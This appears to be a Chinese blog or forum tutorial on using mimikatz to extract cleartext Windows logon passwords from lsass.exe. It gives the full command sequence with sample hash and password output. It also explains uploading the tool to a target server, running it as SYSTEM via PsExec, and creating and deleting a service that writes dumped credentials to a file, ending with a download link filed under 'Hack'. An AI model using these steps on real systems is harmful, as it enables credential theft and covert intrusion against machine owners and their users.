今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:
注:使用前需确定自身系统是x86还是x64
本人测试环境:windows 2003
密码长度:8位
进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,
1、mimikatz # privilege::debug
2、mimikatz # inject::process lsass.exe sekurlsa.dll
3、mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 这里就是密码
我测试的时候还能看到历史密码。比较牛x的神器!
经网络众人分析,支持系统如下:
Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1
XP有些系统版本会出现拒绝访问。
在远程终端中运行该程序部分会提示:”存储空间不足,无法处理此命令”。
这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:
首先提取几个文件:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll
打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。
//最简单实用的方法,使用 PsExec.exe 启动。 //在本机启动交互式命令提示窗口 psexec
psexec -s c:\mimikatz\mimikatz.exe
//启动 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe //提升权限 privilege::debug //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)! inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" //抓取密码 @getLogonPasswords //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。 exit
//创建服务方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword
原下载地址:http://blog.gentilkiwi.com/mimikatz
原文地址:http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
参考地址:http://lcx.cc/?FoxNews=2265.html
本地下载地址:http://jafee.net/Soft/Hack/mimikatz.rar